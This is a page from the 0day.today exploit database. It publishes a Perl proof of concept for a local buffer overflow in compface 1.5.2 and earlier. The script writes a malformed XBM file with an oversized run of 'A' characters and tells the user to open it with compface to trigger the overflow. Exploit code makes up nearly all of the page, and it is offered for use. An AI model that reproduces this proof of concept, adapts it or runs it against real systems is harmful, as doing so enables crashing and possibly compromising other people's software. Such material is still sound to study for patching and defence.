[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC

Author
metalhoney
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6890
Category
dos / poc
Date add
16-06-2009
Platform
linux
======================================================
compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC
======================================================



#!/usr/bin/perl
#########################################################################
#########################################################################
# compface <= 1.5.2 bufer overflow p o c
# vuln only excist on debian and ubuntu? - packages.debian.org/compface -
# author: metalhoney ------- metalhoney1@hotmail.com -------
#########################################################################
open(ISLAM,">allah.xbm") or die;
print ISLAM "#define noname_width 48\n#define noname_height 48\n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {\n";
close(ISLAM) or die;
print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n";
#########################################################################
#########################################################################



#  0day.today [2024-07-04]  #